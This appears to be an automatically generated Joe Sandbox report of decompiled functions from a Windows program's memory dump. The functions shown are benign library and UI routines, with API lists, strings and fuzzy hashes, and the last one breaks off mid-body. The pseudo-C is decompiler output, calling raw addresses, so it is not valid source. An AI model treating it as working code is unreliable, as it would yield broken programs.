Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: __wgetenvchar_traits$H_prolog3___lock__wgetenv_helper_nolock_wcsnlen
String ID: DVWLH^J$IIDIEK[\IO[Q
API String ID: 4033293098-1430980991
Opcode ID: bd1e6fb6748428a436395d9c6abe0715c4a2ae01da91b41eac9dd7dfc787d56e
Instruction ID: 515f03e74159e3b56a9ec7c14907294fe926362d0c5243e9b1b3771b13cb71f2
Opcode Fuzzy Hash: bd1e6fb6748428a436395d9c6abe0715c4a2ae01da91b41eac9dd7dfc787d56e
Instruction Fuzzy Hash: EC31D271A44205AADB10F7A0DC67FEE7368AF16704F045594F509761C2EEB0AF84DA61

Uniqueness

Uniqueness Score: -1.00%

Function 00E64EDF Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

FindCompleteObject.LIBCMT ref: 00E64F00
FindMITargetTypeInstance.LIBCMT ref: 00E64F39

Part of subcall function 00E64B9F: PMDtoOffset.LIBCMT ref: 00E64C31

FindVITargetTypeInstance.LIBCMT ref: 00E64F40
PMDtoOffset.LIBCMT ref: 00E64F51
std::bad_exception::bad_exception.LIBCMT ref: 00E64F7A
__CxxThrowException@8.LIBCMT ref: 00E64F88

Strings

Bad dynamic_cast!, xrefs: 00E64F72

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Find$InstanceOffsetTargetType$CompleteException@8ObjectThrowstd::bad_exception::bad_exception
String ID: Bad dynamic_cast!
API String ID: 1565299582-2956939130
Opcode ID: 17a9e4918a0bfaef4f00cf167ddb9389de1a69ea782a0ab2c19f756f33861529
Instruction ID: 8e040ce2f7c876b7d84453331ad29313e407b64d6d1fa9e6965b3524ec74e06d
Opcode Fuzzy Hash: 17a9e4918a0bfaef4f00cf167ddb9389de1a69ea782a0ab2c19f756f33861529
Instruction Fuzzy Hash: 242105B2A802189FCB10DFA8E842AAE77B9AF59750F143008F505B72C2CA31D901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00D33114 Relevance: 12.1, APIs: 8, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D33114(void* __ecx) {
				int _t16;
				void _t20;
				int _t27;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t32;

				_t28 = __ecx;
				 *((intOrPtr*)(__ecx + 0xc)) = 1;
				 *((intOrPtr*)(_t28 + 0x114)) = GetSystemMetrics(0x31);
				_t16 = GetSystemMetrics(0x32);
				_t30 = _t28 + 0x16c;
				 *(_t28 + 0x118) = _t16;
				SetRectEmpty(_t30);
				if(EnumDisplayMonitors(0, 0, 0xd32faa, _t30) == 0) {
					SystemParametersInfoW(0x30, 0, _t30, 0);
				}
				_t27 = 0;
				_t31 = _t28 + 0x190;
				 *0xf0d540 = 0;
				 *_t31 = 0;
				 *(_t28 + 0x194) = 0;
				if( *((intOrPtr*)(_t28 + 0x180)) == 0) {
					SystemParametersInfoW(0x1002, 0, _t31, 0);
					_t27 = 0;
					if( *_t31 != 0) {
						SystemParametersInfoW(0x1012, 0, _t28 + 0x194, 0);
						_t27 = 0;
					}
				}
				_t32 = _t28 + 0x1a4;
				 *(_t28 + 0x1c8) = _t27;
				 *((intOrPtr*)(_t28 + 0x1a8)) = 1;
				SystemParametersInfoW(0x100a, _t27, _t32, _t27);
				_t20 =  *_t32;
				 *(_t28 + 0xc) =  *(_t28 + 0xc) & 0x00000000;
				 *(_t28 + 0x1a0) = _t20;
				return _t20;
			}

APIs

GetSystemMetrics.USER32(00000031), ref: 00D33128
GetSystemMetrics.USER32(00000032), ref: 00D33132
SetRectEmpty.USER32(?), ref: 00D33141
EnumDisplayMonitors.USER32(00000000,00000000,00D32FAA,?,?,770E9FF0,00000001,00D330D5), ref: 00D33151
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D33168
SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 00D33190
SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 00D331A6
SystemParametersInfoW.USER32 ref: 00D331C8

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: d7db246c04f4046b305c290abbff40d4c3a4ce3aa6be225e4c37916f29fec9f5
Instruction ID: 25abcb6042ec69a86f6cba4507fa0b046a00133c2f95a83daf14c07d660c34b0
Opcode Fuzzy Hash: d7db246c04f4046b305c290abbff40d4c3a4ce3aa6be225e4c37916f29fec9f5
Instruction Fuzzy Hash: 3D1137B2741611BFE7198F61CC4ABE6FB68FF05712F10422EE65996280E7B079548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAA517 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 170COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CAA5AB
_memmove.LIBCMT ref: 00CAA60B
_memmove.LIBCMT ref: 00CAA633
std::_Xinvalid_argument.LIBCPMT ref: 00CAA669

Strings

string too long, xrefs: 00CAA502, 00CAA664
invalid string position, xrefs: 00CAA50C, 00CAA65A

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: cbfc455236f8774d7e615ede8dcf0670fb70e2bcc77225ea794fdcf18ad5ace4
Instruction ID: 2a45a78f750441413ba48dff01603458bc2481f51097a659bb8ccefd476a0057
Opcode Fuzzy Hash: cbfc455236f8774d7e615ede8dcf0670fb70e2bcc77225ea794fdcf18ad5ace4
Instruction Fuzzy Hash: 2E51E031700606DFCF28CE5DD98496AB7BAEF86318B18492DF85297241C770ED42CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00CA990D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CA999C
_memmove.LIBCMT ref: 00CA99DF
_memmove.LIBCMT ref: 00CA9A09
std::_Xinvalid_argument.LIBCPMT ref: 00CA9A35

Strings

string too long, xrefs: 00CA9A30
invalid string position, xrefs: 00CA9A3A

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove$Xinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1771113911-4289949731
Opcode ID: 706e15aea3575535d3af8e9033d2d8805273cf9d7a93c693413adaccfc86cd41
Instruction ID: de9cd3732db1edd5272868ec9d9faf0101219647572587c181265939f1ff85fa
Opcode Fuzzy Hash: 706e15aea3575535d3af8e9033d2d8805273cf9d7a93c693413adaccfc86cd41
Instruction Fuzzy Hash: 6041B771200316EFDF24CF28D88295B77B5EF46748B20492EE8569B341D771ED41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6594 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CA6594(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				intOrPtr _v44;
				signed int _v52;
				char _v88;
				char _v104;
				char _v128;
				char _v152;
				intOrPtr* _t23;
				void* _t24;
				intOrPtr _t36;
				intOrPtr* _t41;
				char* _t43;

				0xe21503(0x5c);
				_t23 =  *((intOrPtr*)( *__ecx + 0x34))();
				_t24 =  *((intOrPtr*)( *_t23 + 8))( &_v152);
				_v52 = _v52 & 0x00000000;
				_t41 =  &_v104;
				_v52 = 1;
				E00CA4197(_t41);
				_v104 = 0xe92cb4;
				0xe2143b( &_v104, 0xee8098, 0, E00CA2ED4(__ebx, _t23,  &_v128, _t24, ": this object doesn\'t support resynchronization"));
				asm("int3");
				0xe21503(0x44);
				 *((intOrPtr*)( *_t41 + 0x28))();
				E00CA1E2C( &_v88, "StreamTransformation: this object doesn\'t support random access");
				_v52 = _v52 & 0x00000000;
				_t43 =  &_v128;
				E00CA4197(_t43);
				_v128 = 0xe92cb4;
				0xe2143b( &_v128, 0xee8098, 0,  &_v88);
				asm("int3");
				_t36 = _v44;
				 *((intOrPtr*)(_t43 + 0xc)) = _t36;
				return _t36;
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA659B

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA65E5

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

__EH_prolog3_GS.LIBCMT ref: 00CA65F2
__CxxThrowException@8.LIBCMT ref: 00CA662B

Strings

: this object doesn't support resynchronization, xrefs: 00CA65B4
StreamTransformation: this object doesn't support random access, xrefs: 00CA65FC

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3_Throw$ExceptionH_prolog3Raise
String ID: : this object doesn't support resynchronization$StreamTransformation: this object doesn't support random access
API String ID: 999754459-3551788113
Opcode ID: ed06d459d653957b347c9e23837d0c1621b2e50bcba3d5a7e29c5ca782b84edb
Instruction ID: 0b2bd1ba8954d7b35e2e91774b8e6a6b70df4003c86c8c602ba39eac137b405b
Opcode Fuzzy Hash: ed06d459d653957b347c9e23837d0c1621b2e50bcba3d5a7e29c5ca782b84edb
Instruction Fuzzy Hash: A7114C70940308AFDF04EBE0D846FDDBBB8AF54315F501458F609BB291DBB09A48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D37919 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00D37919(intOrPtr __ecx, void* __edx, void* __fp0, WCHAR* _a4, struct HINSTANCE__* _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t8;
				void* _t9;
				void* _t14;
				struct HRSRC__* _t15;
				void* _t19;
				void* _t21;
				struct HINSTANCE__* _t24;
				void* _t26;
				void* _t31;

				_t31 = __fp0;
				_t19 = __edx;
				_push(__ecx);
				_push(_t14);
				_t24 = _a8;
				_v8 = __ecx;
				if(_t24 == 0) {
					_t24 =  *(E00D0D804(_t14, _t24) + 0xc);
				}
				_t8 = FindResourceW(_t24, _a4, "PNG");
				_t15 = _t8;
				if(_t15 != 0) {
					_t8 = LoadResource(_t24, _t15);
					_t21 = _t8;
					if(_t21 != 0) {
						_t9 = LockResource(_t21);
						_a8 = _t9;
						if(_t9 != 0) {
							_push(SizeofResource(_t24, _t15));
							_push(_a8);
							_t26 = L00D3798F(_t15, _v8, _t19, _t21, _t24, _t31);
						} else {
							_t26 = 0;
						}
						FreeResource(_t21);
						_t8 = _t26;
					}
				}
				return _t8;
			}

APIs

FindResourceW.KERNEL32(?,?,PNG,?,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D3793A
LoadResource.KERNEL32(?,00000000,?,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D37949
LockResource.KERNEL32(00000000,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D37956
SizeofResource.KERNEL32(?,00000000,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D37969
FreeResource.KERNEL32(00000000,?,00000000,?,00EA53B8,?,00D386FD,?,?,?,00000038,00D375CE), ref: 00D3797E

Strings

PNG, xrefs: 00D37931

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Resource$FindFreeLoadLockSizeof
String ID: PNG
API String ID: 4159136517-364855578
Opcode ID: e6476e6979d02d3ccff7634e6765c64caba67ce54422fac7cfc08b5bd2f7a002
Instruction ID: fb8ecc2316afccdeb0a88f4565720e1962ef540e2afefb69a8273006c5f97a0b
Opcode Fuzzy Hash: e6476e6979d02d3ccff7634e6765c64caba67ce54422fac7cfc08b5bd2f7a002
Instruction Fuzzy Hash: 9801F276504A25BF8B215B959C44DBEB76CEF49360B048225FC09A3311DB30CD008BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0E191 Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D0E191(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t16;

				_t16 = __ecx;
				 *((intOrPtr*)(_t16 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t16 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t16 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t16 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t16 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t16 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t16 + 0x20) = _t14;
				return _t14;
			}

0x00d0e19b
0x00d0e1a1
0x00d0e1a8
0x00d0e1af
0x00d0e1b6
0x00d0e1c3
0x00d0e1ca
0x00d0e1cd
0x00d0e1cf
0x00d0e1d4

APIs

GetSysColor.USER32(0000000F), ref: 00D0E19D
GetSysColor.USER32(00000010), ref: 00D0E1A4
GetSysColor.USER32(00000014), ref: 00D0E1AB
GetSysColor.USER32(00000012), ref: 00D0E1B2
GetSysColor.USER32(00000006), ref: 00D0E1B9
GetSysColorBrush.USER32(0000000F), ref: 00D0E1C6
GetSysColorBrush.USER32(00000006), ref: 00D0E1CD

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 409c7a9710abc4f896a3c0117108d00dff3911dfab65fcfb5907a61f1cb8ea9c
Instruction ID: 87dbdb3a8037b3b1cf69ffbea6f7c4441a4a50ebba67971e99f80cbe5a5c7d3f
Opcode Fuzzy Hash: 409c7a9710abc4f896a3c0117108d00dff3911dfab65fcfb5907a61f1cb8ea9c
Instruction Fuzzy Hash: 05F01271E407297BD710AF729D097467E90FB44720F040527D2089BE80D7B6E460DFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00E7945E Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

__malloc_crt.LIBCMT ref: 00E7947C
std::exception::exception.LIBCMT ref: 00E79496
__CxxThrowException@8.LIBCMT ref: 00E794CC
Concurrency::details::ContextBase::CancelCollection.LIBCMT ref: 00E794E8
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00E794F1

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Base::CancelConcurrency::details::Context$CollectionException@8StealersThrow__malloc_crtstd::exception::exception
String ID:
API String ID: 1697683264-0
Opcode ID: 5f55ab2c5ec04a95c74d488ead489454b44288ee1ee81586b1ad040209d80b2f
Instruction ID: b9eccf4e6e75ddcdea392939cf55566bd4982f9022e06b52fd6a42280fea1652
Opcode Fuzzy Hash: 5f55ab2c5ec04a95c74d488ead489454b44288ee1ee81586b1ad040209d80b2f
Instruction Fuzzy Hash: 4A01C471A4031C6ACB00EFA4E842ADE77FCDF40798F10E166F919BB241EB70DA458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7BA0 Relevance: 7.6, APIs: 5, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00CA7BA0(void* __ebx, void* __eflags) {
				void* _t60;
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t64;
				void* _t65;
				intOrPtr _t70;
				intOrPtr _t78;
				void* _t81;
				intOrPtr _t82;
				intOrPtr* _t105;
				intOrPtr* _t107;
				void* _t108;
				void* _t111;
				void* _t116;

				_t111 = __eflags;
				_t81 = __ebx;
				0xe26748(0x340, 8);
				 *((intOrPtr*)(_t108 - 0x348)) =  *((intOrPtr*)(__ebx + 0x28));
				 *((intOrPtr*)(_t108 - 0x340)) =  *((intOrPtr*)(__ebx + 0x2c));
				_t82 = 0xf;
				 *((intOrPtr*)(_t108 - 4)) = 0;
				 *((char*)(_t108 - 0x339)) = 0;
				 *((intOrPtr*)(_t108 - 0x20)) = _t82;
				 *((intOrPtr*)(_t108 - 0x24)) = 0;
				 *((char*)(_t108 - 0x34)) = 0;
				 *((intOrPtr*)(_t108 - 0x38)) = _t82;
				 *((intOrPtr*)(_t108 - 0x3c)) = 0;
				 *((char*)(_t108 - 0x4c)) = 0;
				 *((char*)(_t108 - 4)) = 2;
				E00CA241A(_t108 - 0x4c, __ebx + 0x10, 0);
				 *((char*)(_t108 - 4)) = 3;
				_t60 = E00CA37AF(_t108 - 0x338, _t111);
				 *((char*)(_t108 - 4)) = 4;
				0xe4a905( *((intOrPtr*)(__ebx + 8)), 0x20,  *((intOrPtr*)(__ebx + 0xc)), 0xc, 0xffffffff);
				_t61 = E00D0BC90(_t60, 0x10);
				 *((intOrPtr*)(_t108 - 0x344)) = _t61;
				 *((char*)(_t108 - 4)) = 5;
				if(_t61 == 0) {
					_t62 = 0;
					__eflags = 0;
				} else {
					_t62 = E00CA38CD(_t61, _t108 - 0x34);
				}
				 *((char*)(_t108 - 4)) = 4;
				0xe4b97b(_t108 - 0x338, _t62, 0x10, 0xffffffff, 4);
				 *((char*)(_t108 - 4)) = 6;
				_t64 = E00D0BC90(_t108 - 0x338, 0x14);
				 *((intOrPtr*)(_t108 - 0x344)) = _t64;
				 *((char*)(_t108 - 4)) = 7;
				_t113 = _t64;
				if(_t64 == 0) {
					_t65 = 0;
					__eflags = 0;
				} else {
					_t65 = E00CA43F1(_t64, _t108 - 0x190, 3);
				}
				_push(_t65);
				_push(1);
				 *((char*)(_t108 - 4)) = 6;
				_push(_t108 - 0x4c);
				E00CA444E(_t108 - 0x84, _t113);
				E00CA4C1B(_t108 - 0x78);
				_t107 =  *((intOrPtr*)(_t108 - 0x340));
				 *((char*)(_t108 - 0x339)) =  *((intOrPtr*)(_t108 - 0xf8));
				_t70 =  *((intOrPtr*)(_t108 - 0x24));
				 *_t107 = _t70;
				if(_t70 != 0) {
					_t105 =  *((intOrPtr*)(_t108 - 0x348));
					if( *_t105 != 0) {
						0xe213f4( *_t105);
					}
					_t78 =  *_t107 + 1;
					0xe26445(_t78);
					 *_t105 = _t78;
					0xe23f30(_t78, 0,  *_t107 + 1);
					_t116 =  *((intOrPtr*)(_t108 - 0x20)) - 0x10;
					_t80 =  >=  ?  *((void*)(_t108 - 0x34)) : _t108 - 0x34;
					0xe219a0( *_t105,  >=  ?  *((void*)(_t108 - 0x34)) : _t108 - 0x34,  *_t107);
					 *((char*)(_t108 - 0x339)) = 1;
				}
				 *((char*)(_t108 - 4)) = 4;
				E00CA4C89(_t108 - 0x190, _t116);
				 *((char*)(_t108 - 4)) = 3;
				E00CA49AB(_t81, _t108 - 0x338, _t116);
				E00CA23D6(_t108 - 0x4c, 1, 0);
				E00CA23D6(_t108 - 0x34, 1, 0);
				E00CA23D6(_t81 + 0x10, 1, 0);
				0xe266b9();
				return  *((intOrPtr*)(_t108 - 0x339));
			}

APIs

__EH_prolog3_catch_GS_align.LIBCMT ref: 00CA7BAC

Part of subcall function 00CA37AF: __EH_prolog3.LIBCMT ref: 00CA37B6

Part of subcall function 00E4A905: __EH_prolog3.LIBCMT ref: 00E4A90C

Part of subcall function 00D0BC90: _malloc.LIBCMT ref: 00D0BCAC

_free.LIBCMT ref: 00CA7CD6
_malloc.LIBCMT ref: 00CA7CE0
_memset.LIBCMT ref: 00CA7CEE
_memmove.LIBCMT ref: 00CA7D03

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3_malloc$H_prolog3_catch_S_align_free_memmove_memset
String ID:
API String ID: 1072502553-0
Opcode ID: 235fc145b52f7527e19c24714637da15cea3f10eb7b27ab01cc2bb7d55517650
Instruction ID: f8fe07f5921fb1ca294d6a9d0a2eb45ebc94bd3cc85849089f7a65a7f7cc5078
Opcode Fuzzy Hash: 235fc145b52f7527e19c24714637da15cea3f10eb7b27ab01cc2bb7d55517650
Instruction Fuzzy Hash: ED51BB30905259EEEB26EF64DC51BDDBBB8AF19314F200199F549B72C2DBB05B40DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00D35A8C Relevance: 7.6, APIs: 5, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00D35A8C(void* __edx, void* __eflags, long _a4, long _a8, long _a12, long _a16, intOrPtr _a20, signed char _a24) {
				signed int _v8;
				void* __ecx;
				void* __ebp;
				long _t30;
				struct HBITMAP__* _t32;
				char _t41;
				struct tagBITMAPINFOHEADER _t43;
				void* _t45;
				long _t48;
				void* _t51;
				void* _t53;
				BITMAPINFO* _t56;
				signed int _t57;

				_t51 = __edx;
				_push(_t45);
				_v8 = _v8 & 0x00000000;
				_t53 = _t45;
				_t56 = E00D35087( &_v8, __eflags, 0x428);
				if(_t56 == 0) {
					L8:
					_t41 = 0;
					__eflags = 0;
					L9:
					_t57 = _v8;
					while(_t57 != 0) {
						_t57 =  *_t57;
						0xe213f4(_t57);
					}
					return _t41;
				}
				_t43 = 0x28;
				0xe23f30(_t56, 0, _t43);
				_t48 = _a16;
				_t56->bmiHeader = _t43;
				_t56->bmiHeader.biWidth = _a4;
				_t41 = 1;
				_t56->bmiHeader.biHeight = _a8;
				_t30 = _a12;
				_t56->bmiHeader.biPlanes = 1;
				_t56->bmiHeader.biBitCount = _t30;
				_t56->bmiHeader.biCompression = _t48;
				if(_t30 > 8) {
					__eflags = _t48 - 3;
					if(_t48 == 3) {
						_t15 =  &(_t56->bmiColors); // 0x28
						0xe243cc(_t15, 0xc, _a20, 0xc);
						E00CA56F3(_t48, _t15);
					}
				} else {
